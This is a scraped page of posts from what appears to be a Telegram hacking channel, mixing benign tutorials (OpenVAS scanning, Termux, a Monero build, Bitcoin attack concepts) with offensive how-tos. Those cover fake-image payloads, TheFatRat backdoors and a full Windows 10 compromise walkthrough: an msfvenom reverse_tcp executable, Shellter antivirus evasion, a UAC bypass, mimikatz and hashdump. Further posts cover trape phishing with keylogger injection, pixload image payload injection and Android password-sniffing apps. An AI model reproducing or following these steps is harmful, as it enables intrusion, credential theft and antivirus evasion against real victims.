UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘HOW CREATE VIRUS INSIDE IMAGE (PAYLOAD):
Use a Fake image.jpg to exploit targets (hide known file extensions)
(facebook.com/UndercOdeTestingCompanie)

๐Ÿฆ‘INSTALLISATION & RUN:

1ยบ - Download framework from github
git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

2ยบ - Set files execution permitions
cd FakeImageExploiter
sudo chmod +x *.sh

3ยบ - Config FakeImageExploiter settings
nano settings

4ยบ - Run main tool
sudo ./FakeImageExploiter.sh

5)WARNING: set Resource-Hacker.exe installer to 'Program Files' (not Program Files (x86))

๐Ÿฆ‘FOR The noob friendly funtion:

> Bypass the need to input your payload.ps1, And let FakeImageExploiter take
care of building the required payload.ps1 + agent.jpg.exe and config the handler.
"With this funtion active, you only need to input your picture.jpg :D"

@ Mr. Botnet(tm)

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
UNDERCODE COMMUNITY
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - - ๐Ÿฆ‘HOW CREATE VIRUS INSIDE IMAGE (PAYLOAD): Use a Fake image.jpg to exploit targets (hide known file extensions) (facebook.com/UndercOdeTestingCompanie) ๐Ÿฆ‘INSTALLISATION & RUN: 1ยบ - Download framework from github โ€ฆ
Payload image tested by UnderCode On Win7/work for lastest win version/ use for learn...
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘THE FAMOUS SCRIPT FATRAT HAVE NEW RELEASE FOR LINUX OS Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV softwโ€ฆ
(instgram.com/UnderCodeTestingCompany)

๐Ÿฆ‘Installation & RUN:

> Instructions on how to install TheFatRat

1) git clone https://github.com/Screetsec/TheFatRat.git

2) cd TheFatRat

3) chmod +x setup.sh && ./setup.sh

๐Ÿฆ‘FEATURES:

> Fully Automating MSFvenom & Metasploit.

> Local or remote listener Generation.

> Easily Make Backdoor by category Operating System.

> Generate payloads in Various formats.

> Bypass anti-virus backdoors.

> File pumper that you can use for increasing the size of your files.

> The ability to detect external IP & Interface address .

> Atomatically creates AutoRun files for USB / CDROM exploitation

@ฬถอ ฬฏฬฏ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘HOW SCAN VULNERABLITITY WITH OPEN VAS 9:
(t.me/UnderCodeTestingOfficial)

๐Ÿฆ‘Installing Openvas 9 on Kali Linux:

> To install Openvas 9 and its dependencies on our Kali Linux system we simply have to run the following command:

1) apt-get update

2) apt-get install openvas

3) Press โ€˜Yโ€™ to continue the installation of OpenVAS and dependencies.

4) The next step to run the setup procedure that will setup OpenVAS and download a large number of Network Vulnerability Tests (NVTs) or signatures.

5) Due to the large number of NVTs (50.000+) the setup procedure might take a while to complete and consume a considerable amount of data

6) Run the following command to start the setup process:

> openvas-setup

7) When the setup process is finished,

> The web interface is running locally on port 9392 and can accessed through: https://localhost:9392.

8) OpenVAS will also setup an admin account and automatically generate a password for this account which is displayed in the last section of the setup output:

9) you can change password via:

openvasmd โ€“user=[username]โ€“new-password=[password]
openvasmd โ€“user=admin โ€“new-password=[password]

10) After logging in on the web interface weโ€™re redirected to the Greenbone Security Assistant dashboard. From this point on we can start to configure and run vulnerability scans.

11) TO STOP OPEN VAS

> openvas-stop

12) To start the OpenVAS services again, run:

> openvas-start

Written by @ฬถอ ฬฏฬฏ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘How to Setup the OpenVAS Virtual Appliance:
(instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘INSTALLISATION & RUN:

1) you can also install the OpenVAS virtual appliance in a network and configure it to periodically run scans on the network.

2) The virtual appliance can be downloaded using the following link:

> http://www.openvas.org/vm.html

3) STart VMware or Virtual Box... and configure as following:

>Letโ€™s start with configuring a VM with the following specifications:

-Processor cores: 2

-2 GB RAM

-10 GB Hard disk

-Network: NAT (only when using VMware Workstation/Free/Virtualbox)

-CD/DVD drive: ISO (choose the downloaded iso file as medium)

-Guest operating system: Linux Kernel 4.x or later 64-bit (VMWare) or

-Other Linux (64bit) (VirtualBox)


4) The next step is to boot the virtual machine :

> Its ask to Setup up GSM

> OK

5) Then its ask to format partion

> YES

6) Please note that this process might take a while to complete. When the installation process is finished we have to specify a username for the administrator user.

> Weโ€™ll keep it default as admin as well as the password

7) After specifying the username and password weโ€™re asked to reboot the machine,

> choose โ€˜yesโ€™ to reboot and also to eject the installation medium

8) Next, weโ€™re asked to configure an IP address for the appliance, choose:

> โ€˜yesโ€™:

9) The next step is to create a web-admin user, choose

> โ€˜Yes

10) Finally weโ€™re ask about a subscription key, unless youโ€™re in the possession of a subscription key,

> choose โ€˜skipโ€™ which will provide with the Greenbone community feed

11) Next weโ€™re asked if we want to update the feed, choose

> โ€˜yesโ€™ to upgrade the feed in the background. After running through all settings we can log out or reboot the appliance and weโ€™re presented with an IP address to access the web interface

12) When we browser to the web interface weโ€™re presented with a login page.

> Use the credentials of the web-admin account weโ€™ve created during the configuration process

Written by @ฬถอ ฬฏฬฏ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘ Scanning with OpenVAS 9 part 2:
> Vulnerability Scanning
(Facebook.com/UnderCodeTestingCompanie)

๐Ÿฆ‘LET S START:

A- Before we can actually start vulnerability scanning with OpenVAS 9, we have to complete the following tasks:

1)Create and configure a target.

2) Create and configure a scan task.

3) Run the scan.

B- The lab setup used for this tutorial looks as follows:

1)Host machine with VMWare Workstation Pro

2)Kali Linux 2018.2 VM with OpenVAS 9.0 installed

3) Metasploitable 2 VM

C- Creating a target in OpenVAS
To create a target, we need to follow 2 steps:

1) Go to โ€˜Configurationโ€™ in the top menu and select โ€™Targetsโ€™.

2) Click the blue icon in the top left corner to create a new target.

D- After hitting the new target button, a dialog screen appears where we have to enter the following information:

1) Target name, weโ€™ll name it Metasploitable

2) The target IP host which is the IP address for our Metasploitable 2 lab machine.

3) Keep all other settings default and click the โ€˜Createโ€™ button.

E- Configuring a scanning task in OpenVAS

To create a new scan task, we have to perform the following steps:

1) Go to โ€˜Scansโ€™ in the top menu and select โ€™Tasksโ€™.

2) Point to the blue icon in the top left corner and select โ€˜New Taskโ€™.

F- After clicking the new scan option, a dialog screen appears where we have to enter the following information:

1) Task name, weโ€™ll name it โ€˜Scan Metasploitable 2โ€™.

2) Make sure that the Metasploitable 2 target weโ€™ve created earlier is selected.

3) Tick the schedule once checkbox.

4) Keep all other settings default and click the โ€˜Createโ€™ button to create the new task.

G- Running the OpenVAS vulnerability scan

The scan task will now execute against the selected target. Please note that full scan may take a while to complete. When you refresh the tasks page you will be able to check the progress for the executed task:

1)Reload the page.

2) Check task status/progress.

H- As expected we can see that OpenVAS found a number of severe vulnerabilities. Letโ€™s have a look at the details of the results.
๐Ÿฆ‘ Interpreting the scan results

Now that the vulnerability scan is finished we can browse to โ€˜Scans -> Reportsโ€™ in the top menu.

> On the reports page we can find the report for the completed scanning task

I- When we click on the vulnerability name we can get an overview of the details regarding the vulnerability.

ENJOY WITH OUR TUTORIALS

@ UnderCodeOfficial

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘Best apps for WIFI android:
(t.me/UNDERCODETESTINGOFFICIAL)

๐Ÿฆ‘ Aircrack-ng

> REQUIRE:

1-Rooted Android Device

2-Computer with Ubuntu 14/ 15/ 16 (or any other Linux distribution)

3-USB OTG Adapter (micro USB to USB female cable)

4-Wireless USB Adapter (This is the most important tool)

5-Time (Must, at any cost, donโ€™t give up)

> https://forum.xda-developers.com/showthread.php?t=2338179

๐Ÿฆ‘Kali Linux Nethunter

> https://www.kali.org/kali-linux-nethunter/

๐Ÿฆ‘ WiFi WPS WPA Tester

>https://play.google.com/store/apps/details?id=com.tester.wpswpatester

๐Ÿฆ‘dSploit

Wi-Fi Cracking
Router PWN
Trace
Port Scanner (scan the ports)
Inspector
Vulnerability finder
>Login cracker
Packet forgery (Change the data packets in between)
Man in the middle (Decide the data packets you want to send)
Simple sniff (Steal Victimโ€™s Data from the phone)
Password sniff (ability to view or steal passwords from the victimโ€™s device)
Session Hijacker (Full control over victimโ€™s Device)
Kill connections (Disable usage of data packets, thereby killing the connection)
Redirect to any particular URL to of the attackerโ€™s choice
Replace images (pop up images/replace them with the ones being viewed)
Replace videos (pop up videos/replace them with the ones being played)
Script injector (run random page scripts)
Custom filter
These extra features give this app an advantage over others but some users find it difficult to use and is not updated anymore.

> https://forum.xda-developers.com/showthread.php?t=1914699

๐Ÿฆ‘ Nmap

>Powerful

>Easy to use

>It is open source so you get all the latest Updates fast free of cost.

>It supports almost all devices.

>Variety of options available.

๐Ÿฆ‘ Arpspoof

> https://forum.xda-developers.com/showthread.php?t=2236465

๐Ÿฆ‘Wi-Fi Inspect

>https://play.google.com/store/apps/details?id=lksystems.wifiintruder

๐Ÿฆ‘Network Spoofer

> https://github.com/w-shackleton/android-netspoof/

๐Ÿฆ‘ Wi-Fi Kill

>< https://github.com/cSploit/android

๐Ÿฆ‘ Arcai.com โ€™s NetCut

> https://play.google.com/store/apps/details?id=com.arcai.netcut

THOSE APPS TESTED BY undercOde

@UnderCodeOfficial

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -

๐Ÿฆ‘TYPES OF BITCOIN ATTACKS Under Code:
(t.me/UnderCodetestingOfficial)

๐Ÿฆ‘Bitcoin Mitigating Attacks
Bitcoin is the most secure cryptocurrency, which provides security at multiple levels of the protocol. It is often rendering sustained sophisticated attacks. In this section, we are going to look at various types of probable attacks in the bitcoin system.

๐Ÿฆ‘The Sybil Attack
The Sybil attack happens in the peer-to-peer network. A malicious attacker wishes to carry out this attack on the bitcoin network. In this, a node in the network operates multiple identities at the same time and undermines the authority in the reputation system. Its main aim is to gain the majority of influence in the network to carry out illegal actions in the system.

>The Sybil attack is difficult to detect and prevent, but the following measures can be useful

๐Ÿฆ‘By increasing the cost of creating a new identity.
Require validation of identities or trust for joining the network.
Give different power to different members.

๐Ÿฆ‘Race Attack
The Race Attack requires the recipients to accept unconfirmed transactions as payment. As an attacker, you can send the same coin to different vendors by using the two different machines. If the vendors deliver the things without waiting for block confirmation, they will soon realize that the transaction was rejected during the mining process. The solution to this is that the vendor must wait for at least one block confirmation before sending things.

This attack is easier to pull off when the attacker has a direct connection to the victim's node. Therefore it is recommended to turn off incoming connections to nodes for receiving payments so that your node will identify their own peers. And it does not allow the payer to submit the payment to the payee directly.

๐Ÿฆ‘Finney Attack
The Finney attack is named after Hal Finney. The Finney attack is one of the types of double-spending problem. In this attack, the attacker is the miner who mines blocks normally. In the block, he includes a transaction which sends some of his coins back to himself without broadcasting the transaction. When he finds a pre-mined block, he sends the same coins in a second transaction. The second transaction would be rejected by other miners, but this will take some time. To prevent this attack, the seller should wait for at least six blocks confirmation before releasing the goods.

๐Ÿฆ‘Vector76 Attack
The Vector76 attack is a combination of the Race attack and the Finney attack such that a transaction that even has one confirmation can still be reversed. In this attack, a miner creates two nodes, one of which is connected to the exchange node, and the other is connected to well-connected peers in the blockchain network. Now, the miner creates two transactions, one high value, and one low value. Then, the attacker pre-mines a high-value transaction to an exchange service. When a block is announced, he quickly sends the pre-mined block directly to the exchange service. When exchange service confirms the high-value transaction, the corrupted attacker sends a low-value transaction to the blockchain network that finally rejects the high-value transaction. As a result, the corrupted attacker's account is deposited on the amount of the high-value transaction. This attack can be protected by disabling the incoming connections and only connecting to well-connected nodes.

๐Ÿฆ‘The 51% Attack
The 51% attack is a potential attack on the blockchain network. It refers to a single miner or group of miners who are trying to control more than 50% of a network's mining power, computing power or hash rate. In this attack, the attacker can block new transactions from taking place or being confirmed. They are also able to reverse the transactions that have already confirmed while they were in control of the network, leading to a double-spending problem.
> When a miner forms a valid block of transactions, the individual will broadcast the block to other miners on the network. It can only be accepted if all transactions in a block are valid according to the existing record on a blockchain. However, a corrupt minor with more than 50% of a network's hash rate does not broadcast solutions to the rest of the network. It results in the formation of two versions of the blockchain. One is the public version of the blockchain, which is being followed by legitimate miners. And second is use by the corrupt miners who are not broadcasting it to the rest of the network.

Written By Mr. Botnet(tm)

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -
โ€”โ€”โ€”โ€”โ€”-๐–€๐–“D๐–Š๐–—๐•ฎ๐–”D๐–Šโ€”โ€”โ€”โ€”โ€”

๐Ÿฆ‘TERMUX some commands BY UnderCode
(T.me/UnderCodeTestingOfficial)

๐Ÿฆ‘INSTALLING Packages:

Letโ€™s install some basic packages. To install packages in termux, the command used is:

> pkg install

๐Ÿฆ‘Update and upgrade:

>pkg update

>pkg update && pkg upgrade

๐Ÿฆ‘Installing Python:

>pkg install python

>For Python2

>pkg install python2

>For Python3

>pkg install python3

๐Ÿฆ‘Installing pip:

>pkg install python-pip

๐Ÿฆ‘Installing Git:

>pkg install git

๐Ÿฆ‘Installing wget:

>pkg install wget

๐Ÿฆ‘Uninstalling Packages:

>pkg uninstall pkg-name

๐Ÿฆ‘List all install packages:

>pkg list-all

๐Ÿฆ‘Installing Deb files:

You can similarly manage dpkg too. In case youโ€™ve got a .deb file, you canโ€™t install it using pkg install command. To install such a file, dpkg is used.

๐Ÿฆ‘Installing:

>dpkg -i ./package.deb

๐Ÿฆ‘Uninstalling:

>dpkg โ€“remove [package name]

๐Ÿฆ‘Listing all installed packages:

>dpkg -l

๐Ÿฆ‘Rest of the commands are almost the same as basic Debian Linux command line.

>Graphical Environment setup:

๐Ÿฆ‘To enable GUI support in termux, make sure youโ€™ve VNC viewer or Xserver support installed on your device. Iโ€™d suggest a VNC viewer. Itโ€™s stable and a better choice for GUI. For a better experience use any third party hardware acceleration app as there is no such support available in termux by default.

๐Ÿฆ‘As I mentioned above, the GUI support uses X11. The X11 packages are available in a separate repository. To enable X11 for GUI support run the following command:

>pkg install x11-repo

WRITTEN BY MR: Botnet(t.m)
โ€”โ€”โ€”โ€”โ€”โ€”๐–€๐–“D๐–Š๐–—๐•ฎ๐–”D๐–Šโ€”โ€”โ€”โ€”โ€”-
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘ THE Cryptonote developers Script tested NEW RELEASE ๐Ÿฆ‘
Monero: the secure, private, untraceable crypto...
(followme๐Ÿ˜ instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘INSTALLISATION & RUN:

1) Clone recursively to pull-in needed submodule(s):

> git clone --recursive https://github.com/monero-project/monero

> If you already have a repo cloned, initialize and update:

2) cd monero

3) git submodule init

4) git submodule update

๐Ÿฆ‘Build instructions

> Monero uses the CMake build system and a top-level Makefile that invokes cmake commands as needed.

> On Linux and macOS

5) Install the dependencies

> Change to the root of the source code directory, change to the most recent release branch, and build:

6) cd monero

7) git checkout release-v0.15

8) make

9) The resulting executables can be found in build/release/bin

> Add PATH="$PATH:$HOME/monero/build/release/bin" to .profile

10) Run Monero with monerod --detach

11) Optional: build and run the test suite to verify the binaries:

12)- make release-test

13) core_tests test may take a few hours to complete.

14) Optional: to build binaries suitable for debugging:

> make debug

15) Optional: to build statically-linked binaries:

> make release-static

๐Ÿฆ‘TESTED ON:

> Raspberry Pi Zero with a clean install of minimal Raspbian Stretch

> macOS 10.11 amd64 macOS 10.11 amd64

> macOS 10.12

> Windows (MSYS2/MinGW) amd64

> Ubanto

Written By Mr. Botnet(tm)

- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
๐Ÿฆ‘ANONYMOUS RUSSIAN HACKERS WORKS TO DDOS WHATSAPP& FCB SERVICES AGAIN ๐Ÿฆ‘
AGAIN THEY WANT TO DDOS WHATSAPP SERVICES
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -

๐Ÿฆ‘How to Attack Windows 10 Machine with Metasploit on Kali Linux + Create Undetectable Virus: FULL
(t.me/UnderCodeTestingOfficial) :

๐Ÿฆ‘LET S START:

1) Creating a Malicious .exe File:

> To create the executable, you would use msfvenom as shown in the command below:

> msfvenom -p windows/meterpreter/reverse_tcp -a x86 โ€“platform windows -f exe LHOST=(IP) LPORT=4444 -o /root/something32.exe

> this will generate generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload.

2) IN SAME COMMAND to get id adress type ifconfig in Terminal

3) Antivirus solutions work by detecting malicious signatures within executables.

4) The payload file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.

๐Ÿฆ‘Making the Executable FUD (Fully Undetectable)๐Ÿฆ‘

5) To encode our executable, we shall be using Shellter. Shellter works by changing the executableโ€™s signatures from the obviously malicious one to a completely new and unique one that can bypass detection.

so type in terminal:

> sudo apt-get install shellter

6) Launch as bash then type A ( auto-mode)

7) Put the path of the file (payload created in steps (before)
+ press enter

8) Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select โ€œYโ€ for yes.

9) The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing โ€œLโ€, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with โ€œ1.โ€

10) Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.

11) run again
> msfconsole
use the generic payload handler โ€œmulti/handlerโ€ using the command use multi/handler. We will then set the payload to match the one set within the executable using the command set payload
(in metasploite)

12) Executing the Payload
On copying the file to our target Windows machine

13) Since the file was not run as โ€œadministrator,โ€ there are Meterpreter commands that canโ€™t be run as they would result in an โ€œaccess deniedโ€ response. This can be confirmed by running the getuid command, which tells us that we are running as user x ...

14) To prove that the user lacks enough privileges, we attempted to run the command mimikatz_command -f sekurlsa::logonPasswords.

15) Privilege Escalation
Privilege escalation allows us to elevate privileges from our less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM user, which has all administrative rights.

Metasploit by default provides us with some methods that allow us to elevate our privileges. On the Meterpreter prompt we use the
> getsystem command

16) getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module that is used to bypass User Access Control. To do so, we โ€œbackgroundโ€ our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and implement this on the session in the background using set SESSION 2.

17) We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.

18) WELL DONE ๐Ÿฆ‘
With these privileges, we can do quite a lot on our compromised target. For instance, we can obtain LM and NTLM password hashes using the hashdump command as shown above. Note that the format of the hashes above is USERNAME:SID:LM_HASH:NTLM_HASH:::.

Written by ฬฏฬฏ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
UNDERCODE COMMUNITY
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - - ๐Ÿฆ‘How to Attack Windows 10 Machine with Metasploit on Kali Linux + Create Undetectable Virus: FULL (t.me/UnderCodeTestingOfficial) : ๐Ÿฆ‘LET S START: 1) Creating a Malicious .exe File: > To create the executable, youโ€ฆ
Not detected By Major Anti-Virus
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -

๐Ÿฆ‘People tracker on the Internet: OSINT analysis and research tool TESTED BY under Code: NEW release 2019
(instagram.com/UnderCodeTestingCompany)

๐Ÿฆ‘INSTALLISATION & RUN:

1) git clone https://github.com/jofpin/trape.git

2) cd trape

3) python2 -m pip install -r requirements.txt

4) python2 trape.py -h

๐Ÿฆ‘Example of execution:

> Example: python2 trape.py --url http://example.com --port 8080

๐Ÿฆ‘Commands run:

PROCESS HOOKS: Manages social engineering attacks or processes in the target's browser.

--- SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.

--- INJECT JS: You keep the JavaScript code running free in real time, so you can manage the execution of a keylogger or your own custom functions in JS which will be reflected in the target's browser.

--- SPEECH: A process of audio creation is maintained which is played in the browser of the target, by means of this you can execute personalized messages in different voices with languages in Spanish and English.

๐Ÿฆ‘PUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; So you can publish the content of your trape server which is executed locally to the Internet, to manage hooks or public attacks.

> You can get information about the user's network.

--- SPEED: Viewing the target's network speed. (Ping, download, upload, type connection)

--- HOSTS OR DEVICES: Here you can get a scan of all the devices that are connected in the target network automatically.

--url In this option you add the URL you want to clone, which works as a decoy.

--port Here you insert the port, where you are going to run the trape server.

--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.

--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.

--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.

--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.

--version You can see the version number of trape.

--update Option used to upgrade to the latest version of trape.

--help It is used to see all the above options, from the executable.

Written by ฬฏฬฏ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
- - - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - - -
- - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - -

๐Ÿฆ‘The Best Online Antivirus Scanners
(instagram.com/UnderCodeTestingCompany):

๐Ÿฆ‘1. Panda Cloud Cleaner

> https://www.pandasecurity.com/uk/homeusers/solutions/cloud-cleaner/

2. ESET Online Scanner

> https://www.eset.com/uk/home/online-scanner/

3. Google Chrome

> Wait, what? Google Chrome has an antivirus scanner? Thatโ€™s right; you can scan your system files for nasties directly from Google Chrome. It does a decent job, too. As Chrome is the most popular browser around the world, there is a strong chance you already have it installed.

4. F-Secure Online Scanner

> https://www.f-secure.com/en_GB/web/home_gb/online-scanner

5. VIrus Total:

> https://www.virustotal.com/#/home/search

6. Metadefender

> https://metadefender.opswat.com/#!/

@ ฬฏฬฏ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -
- - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -

๐Ÿฆ‘ .gif and imagePayload Creating/Injecting tools For ANDROID 2019
(instragram.com/UnderCodeTestingCompany)

๐Ÿฆ‘INSTALLISATION ON OS X:

1-git clone https://github.com/chinarulezzz/pixload

2-sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

3-cd pixload

4-docker build -t pixload .

5-docker run -v "$(pwd):/pixload" -it --rm pixload

6-./bmp.pl [-payload 'STRING'] -output payload.bmp

If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.

7-./bmp.pl -output payload.bmp

[>| BMP Payload Creator/Injector |<]

8-./gif.pl -output payload.gif

[>| GIF Payload Creator/Injector |<
[>] Generating output file
[โœ”] File saved to: payload.gif
[>] Injecting payload into payload.gif
[โœ”] Payload was injected successfully

9-/jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg

10-./jpg.pl -place COM|DQT [-payload 'STRING'] -output payload.jpg

11- -place COM:
The payload will be injected as a 'COMMENT'.

Written by ฬฏฬฏ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
- - - - - Uา‰Nา‰Dา‰Eา‰Rา‰Cา‰Oา‰Dา‰Eา‰- - - - -